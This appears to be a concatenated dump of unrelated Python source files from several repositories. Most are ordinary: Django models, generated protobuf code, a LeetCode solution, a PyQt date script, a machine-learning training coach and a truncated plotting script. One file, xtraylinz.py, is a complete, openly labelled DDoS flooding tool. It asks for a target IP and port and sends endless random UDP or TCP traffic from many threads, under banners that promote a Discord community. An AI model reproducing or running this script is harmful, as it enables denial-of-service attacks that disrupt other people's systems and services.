    timestamp= models.DateTimeField(default=now)

    def __str__(self):
        return self.comment[0:13] + "..." + "by" + " " + self.user.username
class BorrowedBook(models.Model):
    """An accepted loan of a book to a user."""
    book = models.ForeignKey(Book, on_delete=models.CASCADE)
    user = models.ForeignKey(User, on_delete=models.CASCADE)
    # Accumulated late fee — units not evident here; confirm with views.
    fine = models.IntegerField(default = 0)
    accepted = models.DateTimeField(auto_now_add=True)
    # Loan duration — presumably days, mirroring Request.Days; confirm.
    time = models.IntegerField()
class StarRating(models.Model):
    """A single user's star rating for a book."""
    sno= models.AutoField(primary_key=True)
    strating=models.IntegerField(default = 0)
    user=models.ForeignKey(User, on_delete=models.CASCADE)
    book=models.ForeignKey(Book, on_delete=models.CASCADE)

    def __str__(self):
        return str(self.strating) + "..." + self.user.username
| 2,529 |
polaq_create/squad_pl/proto/dataset_pb2.py
|
tjur/polaq_master_thesis
| 1 |
2024435
|
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: dataset.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from stanfordnlp.protobuf import CoreNLP_pb2 as CoreNLP__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='dataset.proto',
package='',
syntax='proto2',
serialized_pb=_b('\n\rdataset.proto\x1a\rCoreNLP.proto\"8\n\x07\x41rticle\x12\r\n\x05title\x18\x01 \x02(\t\x12\x1e\n\nparagraphs\x18\x02 \x03(\x0b\x32\n.Paragraph\"_\n\tParagraph\x12\x34\n\x07\x63ontext\x18\x01 \x02(\x0b\x32#.edu.stanford.nlp.pipeline.Document\x12\x1c\n\x03qas\x18\x02 \x03(\x0b\x32\x0f.QuestionAnswer\"\xa0\x01\n\x0eQuestionAnswer\x12\n\n\x02id\x18\x01 \x02(\t\x12\x35\n\x08question\x18\x02 \x02(\x0b\x32#.edu.stanford.nlp.pipeline.Document\x12\x34\n\x07\x61nswers\x18\x03 \x03(\x0b\x32#.edu.stanford.nlp.pipeline.Document\x12\x15\n\ranswerOffsets\x18\x04 \x03(\x05')
,
dependencies=[CoreNLP__pb2.DESCRIPTOR,])
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_ARTICLE = _descriptor.Descriptor(
name='Article',
full_name='Article',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='title', full_name='Article.title', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='paragraphs', full_name='Article.paragraphs', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=32,
serialized_end=88,
)
_PARAGRAPH = _descriptor.Descriptor(
name='Paragraph',
full_name='Paragraph',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='context', full_name='Paragraph.context', index=0,
number=1, type=11, cpp_type=10, label=2,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='qas', full_name='Paragraph.qas', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=90,
serialized_end=185,
)
_QUESTIONANSWER = _descriptor.Descriptor(
name='QuestionAnswer',
full_name='QuestionAnswer',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='QuestionAnswer.id', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='question', full_name='QuestionAnswer.question', index=1,
number=2, type=11, cpp_type=10, label=2,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='answers', full_name='QuestionAnswer.answers', index=2,
number=3, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='answerOffsets', full_name='QuestionAnswer.answerOffsets', index=3,
number=4, type=5, cpp_type=1, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=188,
serialized_end=348,
)
# Resolve message-typed field references that the serialized descriptor
# stores only by name: wire local messages and the CoreNLP Document type,
# then register all message types on the file descriptor.
_ARTICLE.fields_by_name['paragraphs'].message_type = _PARAGRAPH
_PARAGRAPH.fields_by_name['context'].message_type = CoreNLP__pb2._DOCUMENT
_PARAGRAPH.fields_by_name['qas'].message_type = _QUESTIONANSWER
_QUESTIONANSWER.fields_by_name['question'].message_type = CoreNLP__pb2._DOCUMENT
_QUESTIONANSWER.fields_by_name['answers'].message_type = CoreNLP__pb2._DOCUMENT
DESCRIPTOR.message_types_by_name['Article'] = _ARTICLE
DESCRIPTOR.message_types_by_name['Paragraph'] = _PARAGRAPH
DESCRIPTOR.message_types_by_name['QuestionAnswer'] = _QUESTIONANSWER
Article = _reflection.GeneratedProtocolMessageType('Article', (_message.Message,), dict(
DESCRIPTOR = _ARTICLE,
__module__ = 'dataset_pb2'
# @@protoc_insertion_point(class_scope:Article)
))
_sym_db.RegisterMessage(Article)
Paragraph = _reflection.GeneratedProtocolMessageType('Paragraph', (_message.Message,), dict(
DESCRIPTOR = _PARAGRAPH,
__module__ = 'dataset_pb2'
# @@protoc_insertion_point(class_scope:Paragraph)
))
_sym_db.RegisterMessage(Paragraph)
QuestionAnswer = _reflection.GeneratedProtocolMessageType('QuestionAnswer', (_message.Message,), dict(
DESCRIPTOR = _QUESTIONANSWER,
__module__ = 'dataset_pb2'
# @@protoc_insertion_point(class_scope:QuestionAnswer)
))
_sym_db.RegisterMessage(QuestionAnswer)
# @@protoc_insertion_point(module_scope)
| 6,416 |
H2H/Organisation/admin.py
|
saefty/happy2help_backend
| 0 |
2022906
|
from django.contrib import admin
# Register your models here.
from .models import Organisation
@admin.register(Organisation)
class OrganisationAdmin(admin.ModelAdmin):
    """Register Organisation in the Django admin with default behaviour."""
    pass
| 179 |
vitrage-4.3.1/vitrage/evaluator/actions/__init__.py
|
scottwedge/OpenStack-Stein
| 89 |
2024430
|
# Copyright 2016 - Nokia
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
# Register options for the service
# oslo.config options for the evaluator service; registered by the consumer.
OPTS = [
    cfg.StrOpt('evaluator_notification_topic_prefix',
               default='vitrage_evaluator_notifications',
               help='A prefix of the topic on which events will be sent from '
                    'the evaluator to the specific notifiers')
]
| 903 |
lightflow/models/utils.py
|
portrain/Lightflow
| 60 |
2024086
|
def find_indices(lst, element):
    """ Returns the indices for all occurrences of 'element' in 'lst'.

    Args:
        lst (list): List to search.
        element: Element to find (matched with ``==``, same as list.index).

    Returns:
        list: Indices of every match in ascending order (empty if none).
    """
    # Single enumerate pass instead of repeated list.index() scans,
    # which re-search the list from each previous hit.
    return [index for index, value in enumerate(lst) if value == element]
| 442 |
xtraylinz.py
|
ExExExExA/xtr
| 3 |
2022874
|
#!/usr/bin/env python3
import random
import socket
import threading
print (" - - > DDOS ATTACK !! DDOS ATTACK !! < - - ")
print (" - - > DONT ABUSE THIS TOOLS !!!! < - - ")
print (" - - > MY DISCORD? XTraylinz#0965 <- - ")
print (" - - > JIKA BUTUH BANTUAN LEBIH LANJUT BISA PM DISCORD SAYA < - - ")
print (" - - > JOIN COMMUNITY LINK DIBAWAH < - - ")
print (" - - > https://discord.gg/nWDNdZRtBa < - - ")
print (" - - > BUAT YANG MAU BELAJAR LEBIH, JOIN SKUY < - - ")
ip = str(input(" Ip:"))
port = int(input(" Port:"))
choice = str(input(" (y/n):"))
times = int(input(" Paket :"))
threads = int(input(" Threads:"))
def run():
data = random._urandom(1000)
i = random.choice(("[+]","[-]"))
while True:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
addr = (str(ip),int(port))
for x in range(times):
s.sendto(data,addr)
print(i +" XTRAYLINZ TEAM ATTACK ")
except:
print("[!] RUSAK")
def run2():
data = random._urandom(16)
i = random.choice(("[*]","[!]","[#]"))
while True:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip,port))
s.send(data)
for x in range(times):
s.send(data)
print(i +" XTRAYLINZ TEAM ATTACK ")
except:
s.close()
print("[*] RUSAK")
for y in range(threads):
if choice == 'y':
th = threading.Thread(target = run)
th.start()
else:
th = threading.Thread(target = run2)
th.start()
| 1,494 |
code/778.swim-in-rising-water.py
|
ProHiryu/leetcode
| 3 |
2024318
|
#
# @lc app=leetcode id=778 lang=python3
#
# [778] Swim in Rising Water
#
# @lc code=start
class Solution:
    '''
    LC 778 "Swim in Rising Water": minimum t such that a path from (0, 0)
    to (N-1, N-1) exists using only cells with elevation <= t.

    Strategy (Dijkstra-like best-first search):
    1. record every visited cell in a set
    2. keep a min-heap of frontier cells keyed by max elevation on the path
    3. always expand the cheapest frontier cell (heappop)
    '''
    # Annotation is quoted so the class still loads without `List` imported
    # (the original bare `List[List[int]]` raised NameError outside leetcode).
    def swimInWater(self, grid: 'List[List[int]]') -> int:
        import heapq  # local import: module was never imported in this file
        if not grid or not grid[0]:
            # Empty grid: nothing to cross. Was `return False` (a bool where
            # callers expect an int); 0 keeps falsiness but fixes the type.
            return 0
        n = len(grid)
        heap = [(grid[0][0], (0, 0))]
        seen = {(0, 0)}
        while True:
            time, (r, c) = heapq.heappop(heap)
            if r == n - 1 and c == n - 1:
                return time
            for nr, nc in ((r + 1, c), (r - 1, c), (r, c + 1), (r, c - 1)):
                if 0 <= nr < n and 0 <= nc < n and (nr, nc) not in seen:
                    seen.add((nr, nc))
                    # path cost = max elevation encountered so far
                    heapq.heappush(heap, (max(time, grid[nr][nc]), (nr, nc)))
| 924 |
Time and Date/time_to_E3.py
|
Atropos148/PyQT5_tutorial
| 0 |
2024348
|
#!/usr/bin/python3
from PyQt5.QtCore import QDate
def ask_about_E3_date():
    """Prompt for a date typed as 'year, month, day' and return the parts.

    Returns:
        list[str]: the three comma-separated fields with surrounding
        whitespace removed.
    """
    print("When is the next E3?")
    E3_date_input = input('Put in date(numbers): year, month, day\n')
    # str.strip() returns a NEW string; the original loop discarded that
    # result, so the parts were never actually trimmed. Keep the result.
    return [part.strip() for part in E3_date_input.split(',')]
now = QDate.currentDate()
print("Do you want E3 2018?")
answer = input('1. Yes\n2. No\n')
if int(answer) == 1:
    # Hard-coded E3 2018 start date.
    next_E3 = QDate(2018, 6, 12)
else:
    # User supplies (year, month, day) strings; int() tolerates spaces.
    E3_date = ask_about_E3_date()
    next_E3 = QDate(int(E3_date[0]), int(E3_date[1]), int(E3_date[2]))
print("Days until E3: {0}".format(now.daysTo(next_E3)))
| 627 |
jsonclasses/modifiers/div_modifier.py
|
Jesse-Yung/jsonclasses
| 50 |
2024278
|
"""module for div modifier."""
from __future__ import annotations
from typing import Any, Callable, Union, TYPE_CHECKING
from .modifier import Modifier
if TYPE_CHECKING:
from ..ctx import Ctx
from ..types import Types
class DivModifier(Modifier):
    """Div modifier: divides a numeric value by the configured divisor."""

    def __init__(self, by: int | float | Callable | Types):
        self.by = by

    def transform(self, ctx: Ctx) -> Any:
        value = ctx.val
        # Exact type check (excludes bool and other int/float subclasses),
        # matching the original `type(...) is int / is float` test.
        if type(value) in (int, float):
            return value / self.resolve_param(self.by, ctx)
        return value
| 544 |
utils/webpage_designer.py
|
motelian/NutriSmart
| 0 |
2024306
|
import streamlit as st
def expander(food_dict, food_key, expander_handle):
    ''' Render one consumed food item inside a streamlit expander
    (e.g. Breakfast/Lunch/Dinner) and return the serving quantity,
    possibly edited by the user, as a float.'''
    label = '{} ({})'.format(
        food_dict['food_name'].capitalize(), food_dict['serving_unit'])
    with expander_handle:
        edited_qty = st.text_input(
            label, value=str(food_dict['serving_qty']), key=food_key)
    return float(edited_qty)
| 496 |
tests/pc/threading/script_2/main.py
|
RodrigoNazar/Evoluciones-Sensibles
| 0 |
2023061
|
import threading as th
import time
start = time.perf_counter()
def do_something(t=1):
    """Sleep for *t* seconds, logging before and after."""
    print('\nSleeping {} second...'.format(t))
    time.sleep(t)
    print('Done Sleeping')
t1 = th.Thread(target=do_something)
t2 = th.Thread(target=do_something)
t1.start() # Empieza la ejecución del thread
t2.start()
t1.join() # Hay que esperar a que termine el thread para seguir
t2.join()
finish = time.perf_counter()
print(f'Finished in {round(finish - start, 2)} second(s)')
| 472 |
devops_function/functions/helloworldfn/func.py
|
jonschreiber/oci-devops-quickstart
| 6 |
2024351
|
#
# oci-load-file-into-adw-python version 1.0.
#
# Copyright (c) 2020 Oracle, Inc.
# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl.
#
import io
import json
import requests
from fdk import response
def handler(ctx, data: io.BytesIO=None):
    """OCI Functions entry point: reply with a static hello-world JSON body."""
    payload = json.dumps({"status": "Hello World! Version 0.0.1"})
    return response.Response(
        ctx,
        response_data=payload,
        headers={"Content-Type": "application/json"},
    )
| 478 |
setup.py
|
mushkevych/synergy_odm
| 0 |
2024125
|
from distutils.core import setup
# Packaging metadata for the synergy_odm distribution.
# NOTE(review): distutils is deprecated (removed in Python 3.12); consider
# migrating this call to setuptools.
setup(name='synergy_odm',
      version='0.11',
      description='Synergy Object-Document Mapper',
      author='<NAME>',
      author_email='<EMAIL>',
      url='https://github.com/mushkevych/synergy_odm',
      packages=['odm'],
      long_description='''Object Document Mapping for convenient python-to-json and json-to-python conversions''',
      license='BSD 3-Clause License',
      classifiers=[
          'Development Status :: 5 - Production/Stable',
          'Environment :: Console',
          'Intended Audience :: Developers',
          'License :: OSI Approved :: BSD License',
          'Operating System :: OS Independent',
          'Programming Language :: Python :: 3.7',
          'Programming Language :: Python :: 3.8',
          'Topic :: Software Development :: Libraries',
      ],
      requires=[]
      )
| 870 |
logout_test.py
|
uProxy/1-ufo-management-server
| 1 |
2024368
|
"""Test the logout module."""
from mock import patch
from config import PATHS
import unittest
import webtest
import logout
class LogoutTest(unittest.TestCase):
  """Unit tests for the logout module."""

  def setUp(self):
    """Wrap the logout WSGI app so handlers can be exercised directly."""
    self.testapp = webtest.TestApp(logout.APP)

  @patch('google.appengine.api.users.create_logout_url')
  def testLogoutHandler(self, mock_create_url):
    """Logging out should redirect via the generated logout URL.

    The logout URL is created against the user page path so that a user
    can sign back in without looping through the logout flow again.
    """
    redirect_target = 'foo/bar'
    mock_create_url.return_value = redirect_target
    result = self.testapp.get(PATHS['logout'])
    mock_create_url.assert_called_once_with(PATHS['user_page_path'])
    self.assertEqual(result.status_int, 302)
    self.assertTrue(redirect_target in result.location)
| 941 |
apps/kg/utils.py
|
ketyi/dgl
| 9,516 |
2024509
|
# -*- coding: utf-8 -*-
#
# setup.py
#
# Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import math
def get_compatible_batch_size(batch_size, neg_sample_size):
    """Round *batch_size* up to a multiple of *neg_sample_size* when the two
    are incompatible (neg_sample_size smaller and not a divisor); otherwise
    return *batch_size* unchanged. Prints a notice when adjusting."""
    incompatible = (neg_sample_size < batch_size
                    and batch_size % neg_sample_size != 0)
    if not incompatible:
        return batch_size
    adjusted = int(math.ceil(batch_size / neg_sample_size) * neg_sample_size)
    print('batch size ({}) is incompatible to the negative sample size ({}). Change the batch size to {}'.format(
        batch_size, neg_sample_size, adjusted))
    return adjusted
| 1,128 |
Practice-8100/cours1.py
|
BuiTTm/data-science-from-scratch
| 0 |
2023765
|
import numpy as np
from numpy.linalg import svd
# 3x3 design matrix. NOTE(review): np.matrix is deprecated in favour of
# np.array -- left as-is since downstream ops rely on matrix semantics.
X = np.matrix([1,1,1,0,2,5,2,5,-1]).reshape(3,3)
print(X)
X_T = np.matrix.transpose(X)
y = np.matrix([6, -4, 27]).reshape(3,1)
# Normal equations: betas = (X^T X)^-1 X^T y
XT_X = np.matmul(X_T, X)
XT_y = np.matmul(X_T, y)
betas = np.matmul(np.linalg.inv(XT_X), XT_y)
print(f'betas={betas}')
# Section: eigenvalues and eigenvectors
C = np.array([1,2,4,3]).reshape(2,2)
print(f'Vecteur prore et matrix propre={np.linalg.eig(C)}')
# Singular value decomposition: M = U @ diag(Sigma) @ VT
M = np.array([[4, 1, 5], [2, -3, 2], [1, 2, 3]])
U, Sigma, VT = svd(M)
print("Valeurs singulieres de gauche):")
print(U)
print("Valeurs singulieres:")
print(np.diag(Sigma))
print("valeurs singulieres de droite:")
print(VT)
| 656 |
5 kyu/Check that the situation is correct.py
|
mwk0408/codewars_solutions
| 6 |
2024064
|
def is_it_possible(field):
    """Check whether a tic-tac-toe position is reachable in a legal game.

    *field* is a 9-char string where 'X' and '0' mark the players' moves
    (X always moves first). Returns False for impossible positions:
    wrong move counts, both players winning, or a winner whose move
    count contradicts having just moved.
    """
    xs = field.count("X")
    os = field.count("0")
    if os > xs or abs(xs - os) >= 2:
        return False
    x_won = possible(field, "X")
    o_won = possible(field, "0")
    if x_won and o_won:
        return False
    if x_won and xs == os:
        # X just won, so X must be one move ahead
        return False
    if o_won and xs != os:
        # 0 just won, so counts must be equal
        return False
    return True


def possible(table, sign):
    """True if *sign* has three in a row (row, column, or diagonal)."""
    triple = sign * 3
    lines = [table[0] + table[4] + table[8],  # main diagonal
             table[2] + table[4] + table[6]]  # anti-diagonal
    lines += [table[r:r + 3] for r in range(0, len(table), 3)]  # rows
    lines += [table[c] + table[c + 3] + table[c + 6] for c in range(3)]  # cols
    return triple in lines
| 694 |
scripts/control/coach.py
|
Glaciohound/VCML
| 52 |
2024641
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File : coach.py
# Author : <NAME>, <NAME>
# Email : <EMAIL>, <EMAIL>
# Date : 17.07.2019
# Last Modified Date: 20.11.2019
# Last Modified By : Chi Han
#
# This file is part of the VCML codebase
# Distributed under MIT license
#
# for building training dataset and scheduling training
import os
import torch
from shutil import copyfile
from utility.common import make_dir, init_seed
class Coach:
    """Drives one training run of a model over a staged curriculum.

    Owns the model, the per-stage datasets/dataloaders, checkpoint I/O,
    and the ``message``/``control`` queues used to coordinate with a
    supervising process. The ``recordings`` dict (train/val/test recording
    objects, optionally ``ref_recording``) is merged straight into the
    instance via ``__dict__.update``.
    """

    def __init__(self,
                 args, index, schedule, question_parser, model,
                 tools, recordings, logger, local_dir,
                 message, control, device, plt, is_main):
        self.args = args
        self.index = index
        self.schedule = schedule
        self.question_parser = question_parser
        self.model = model
        self.tools = tools
        self.logger = logger
        self.local_dir = local_dir
        self.message = message
        self.control = control
        self.device = device
        self.plt = plt
        self.is_main = is_main
        # injects train_recording / val_recording / test_recording
        # (and optionally ref_recording) as instance attributes
        self.__dict__.update(recordings)
        model.set_coach(self)
        self.init_value()

    def init_value(self):
        # -1 is the "not started yet" sentinel for both counters
        self.stage_ind = -1
        self.epoch = -1

    def add_ref_dataset(self, ref_dataset):
        self.ref_dataset = ref_dataset

    def step(self, i_epoch):
        """Activate the latest curriculum stage whose start_time <= i_epoch."""
        ind = 0
        for i, item in enumerate(self.stages):
            if item['start_time'] <= i_epoch:
                ind = i
        self.stage_ind = ind
        self.setup_dataset(ind)

    def schedule_dataset(self):
        """Expand self.schedule (relative lengths) into stages with
        absolute start/end epochs."""
        self.stages = []
        offset = 0
        for item in self.schedule:
            new_dataset = {
                'start_time': offset,
                'end_time': offset + item['length'],
                'question_splits': item['question_splits'],
                'test_concepts': item['test_concepts'],
            }
            self.stages.append(new_dataset)
            offset = new_dataset['end_time']

    def setup_dataset(self, ind):
        # refresh the three dataloaders from stage *ind*
        dataset_suite = self.stages[ind]['question_splits']
        self.train = dataset_suite['train'].get_dataloader()
        self.val = dataset_suite['val'].get_dataloader()
        self.test = dataset_suite['test'].get_dataloader()

    def torch_scheduler_step(self):
        # NOTE(review): step() expects an epoch index but is handed the
        # validation-loss value here -- confirm this is intentional.
        val_loss = self.val_recording.group['loss']
        self.step(val_loss.value)

    def state_dict(self):
        """Full checkpoint of the run (model, tools, optimizer, scheduler,
        logger, recordings, and per-stage dataset state).

        Requires training_init() to have run (optimizer/scheduler exist).
        """
        stages_ckpt = [
            {
                'start_time': stage['start_time'],
                'end_time': stage['end_time'],
                'question_splits': {
                    split: dataset.state_dict()
                    for split, dataset
                    in stage['question_splits'].items()
                },
                'test_concepts': stage['test_concepts'],
            } for stage in self.stages
        ]
        ckpt = {
            'model': self.model.state_dict(),
            'tools': self.tools.state_dict(),
            'optimizer': self.optimizer.state_dict(),
            'scheduler': self.scheduler.state_dict(),
            'logger': self.logger.state_dict(),
            'train_recording': self.train_recording.state_dict(),
            'val_recording': self.val_recording.state_dict(),
            'test_recording': self.test_recording.state_dict(),
            'stage_ind': self.stage_ind,
            'stages': stages_ckpt,
            'epoch': self.epoch,
        }
        # ref_recording is optional; only saved when present
        if hasattr(self, 'ref_recording'):
            ckpt['ref_recording'] = self.ref_recording.state_dict()
        return ckpt

    def partial_state_dict(self):
        """Minimal checkpoint (model + tools) for use as a pretrained base."""
        ckpt = {
            'model': self.model.state_dict(),
            'tools': self.tools.state_dict(),
        }
        return ckpt

    def load_state_dict(self, ckpt):
        """Restore everything saved by state_dict(), in place."""
        self.model.load_state_dict(ckpt['model'])
        self.tools.load_state_dict(ckpt['tools'])
        self.optimizer.load_state_dict(ckpt['optimizer'])
        self.scheduler.load_state_dict(ckpt['scheduler'])
        self.logger.load_state_dict(ckpt['logger'])
        self.train_recording.load_state_dict(ckpt['train_recording'])
        self.val_recording.load_state_dict(ckpt['val_recording'])
        self.test_recording.load_state_dict(ckpt['test_recording'])
        if 'ref_recording' in ckpt and hasattr(self, 'ref_recording'):
            ref_ckpt = ckpt['ref_recording']
            # backward compatibility: older checkpoints stored the object
            # itself rather than its state dict
            if not isinstance(ref_ckpt, dict):
                ref_ckpt = ref_ckpt.state_dict()
            self.ref_recording.load_state_dict(ref_ckpt)
        self.stage_ind = ckpt['stage_ind']
        self.epoch = ckpt['epoch']
        stages_ckpt = ckpt['stages']
        # stages themselves are rebuilt by schedule_dataset(); only their
        # saved fields are restored here
        for i, stage in enumerate(self.stages):
            stage['start_time'] = stages_ckpt[i]['start_time']
            stage['end_time'] = stages_ckpt[i]['end_time']
            for split, dataset in stage['question_splits'].items():
                dataset.load_state_dict(
                    stages_ckpt[i]['question_splits'][split])
            stage['test_concepts'] = stages_ckpt[i]['test_concepts']

    def load_partial(self, ckpt):
        # load only what necessary for the pretrained model
        self.model.load_state_dict(ckpt['model'], strict=False)
        self.tools.load_state_dict(ckpt['tools'])

    @property
    def ckpt_dir(self):
        # checkpoints live under <local_log_dir>/ckpt
        ckpt_dir = os.path.join(self.args.local_log_dir, 'ckpt')
        return ckpt_dir

    def ckpt_filename(self, suffix, index):
        """Full path of the checkpoint file 'Coach<index>_<suffix>.pth'."""
        filename = os.path.join(
            self.ckpt_dir,
            f'Coach{index}_{suffix}.pth'
        )
        return filename

    def save(self, suffix, index=None):
        """Write a full checkpoint; *index* defaults to this coach's index."""
        if index is None:
            index = self.index
        ckpt = self.state_dict()
        self.make_dir()
        torch.save(ckpt, self.ckpt_filename(suffix, index))

    def save_partial(self, suffix, index=None):
        """Write a model+tools-only checkpoint, suffixed '_partial'."""
        if index is None:
            index = self.index
        ckpt = self.partial_state_dict()
        self.make_dir()
        torch.save(ckpt, self.ckpt_filename(str(suffix) + '_partial', index))

    def copy_ckpt(self, from_suffix, to_suffix, index=None):
        """Duplicate an existing checkpoint file under a new suffix."""
        if index is None:
            index = self.index
        from_name = self.ckpt_filename(from_suffix, index)
        to_name = self.ckpt_filename(to_suffix, index)
        copyfile(from_name, to_name)

    def load(self, suffix, index=None):
        """Read a full checkpoint (mapped onto self.device) and restore it."""
        if index is None:
            index = self.index
        ckpt = torch.load(
            self.ckpt_filename(suffix, index),
            map_location=self.device
        )
        self.load_state_dict(ckpt)

    def make_dir(self):
        make_dir(self.ckpt_dir)

    def wait(self):
        """Block on the control queue, servicing commands until 'let_go'."""
        let_go = False
        while not let_go:
            command = self.get()
            if command['type'] == 'let_go':
                let_go = True
            else:
                self.process(command)

    def ready(self):
        # tell the supervisor this coach is ready to proceed
        self.send('ready')

    def process(self, command):
        """Dispatch one control command; only 'log' is supported."""
        if command['type'] == 'log':
            self.logger(command['content'], pretty=True)
        else:
            raise Exception(f'unrecognized command: {command}')

    def send(self, item):
        self.message.put(item)

    def get(self):
        command = self.control.get()
        return command

    def training_init(self):
        """Seed RNGs, move the model to the device, and build the
        optimizer/scheduler pair."""
        init_seed(self.args.random_seed)
        self.model.to(self.device)
        self.optimizer, self.scheduler = self.model.init()

    def synchronize(self):
        # handshake: announce readiness, then wait for 'let_go'
        self.ready()
        self.wait()

    def set_index(self, index):
        self.index = index
| 7,560 |
Exercicios/ex091 - Jogo de dados em python.py
|
anderdot/curso-em-video-python
| 0 |
2023717
|
# Desafio 091: Crie um programa onde 4 jogadores joguem um dado e tenham
# resultados aleatórios. Guarde esses resultados em um dicionário em Python.
# No final, coloque esse dicionário em ordem, sabendo que o vencedor tirou
# o maior número no dado.
from cores import cor
from random import randint
from operator import itemgetter
# One 1-6 die roll per player, keyed by player name.
jogo = {
    'Jogador 1': randint(1, 6),
    'Jogador 2': randint(1, 6),
    'Jogador 3': randint(1, 6),
    'Jogador 4': randint(1, 6),
}
print(f'{" Valores Sorteados ":-^30}')
for k, v in jogo.items():
    print(f'{cor.verde}{k}{cor.reset} tirou {cor.verde}{v}{cor.reset} no dado.')
print(f'{" Ranking ":-^30}')
# Sort (player, roll) pairs by roll value, highest first -> ranking order.
jogo = sorted(jogo.items(), key=itemgetter(1), reverse=True)
for i, v in enumerate(jogo):
    # Outer f-string centers the line; .format fills in colors and values.
    print(f"{'{1}{2}º{0} lugar: {1}{3}{0} com {1}{4}{0}.':^30}".format(
        cor.reset,
        cor.verde,
        i + 1,
        v[0],
        v[1]
    ))
| 905 |
python/15.py
|
kylekanos/project-euler-1
| 0 |
2023724
|
#!/usr/bin/env python
# number of routes is c(40,20)
# (number of binary strings with
# 20 0's and 20 1's)
def fact(n):
    # Factorial (Python 2). The explicit initial value 1 makes fact(0) and
    # fact(1) return 1; without it reduce() raised TypeError on the empty
    # xrange(2, n+1).
    return reduce(lambda x, y: x * y, xrange(2, n + 1), 1)
print fact(40)/(fact(20)*fact(20))
| 207 |
Assignments/2.4/Bonus17.py
|
cRohda/Comp-Sci
| 0 |
2024117
|
list1 = ['a', 2, 4, 2, 'a', 8, 4, 9, 2, 'b']  # input with duplicates
list2 = []  # each distinct value exactly once, first-seen order
for value in list1:
    # keep only the first occurrence of each value
    if value not in list2:
        list2.append(value)
print(list2)
| 417 |
src/visualizations/make_pie_chart.py
|
nightingal3/metascience
| 2 |
2024277
|
import csv
import matplotlib.pyplot as plt
import pickle
import matplotlib.cm as cm
from collections import OrderedDict
from scipy.stats import pearsonr
from statsmodels.stats.multitest import multipletests
import pdb
import operator
# Fixed display order for model names in the pie charts; commented entries
# are model variants currently excluded from the analysis.
order = OrderedDict({
    "kNN": 0,
    #"2NN": 1,
    #"3NN": 2,
    #"4NN": 3,
    #"5NN": 4,
    "exemplar": 5,
    #"Exemplar (s=0.001)": 6,
    #"Exemplar (s=0.1)": 7,
    #"Exemplar (s=1)": 8,
    #"Exemplar":9,
    "progenitor": 10,
    "prototype": 11,
    #"Exemplar (s=1)": 8,
    "local": 12,
    "Null": 13
})
# One Set3 colormap color per model, in `order` key order.
colours = dict(zip(order.keys(), plt.cm.Set3.colors[:len(order)]))
def get_winners(model_dict: dict, p_vals=True, len_included=False, include_null=False, dict_format=False) -> dict:
    """Map each scientist to (best score, [best model(s)]).

    *model_dict* is {model_name: {scientist: score-record}}. Depending on
    flags, a score-record is a bare value, an (value, p/len) tuple, or a
    dict with 'win_ratio'/'p-val'/'num_papers' keys.

    NOTE(review): mutates *model_dict* in place (deletes excluded models).
    """
    # Drop model variants no longer included in the analysis.
    if "Exemplar (s=1)" in model_dict:
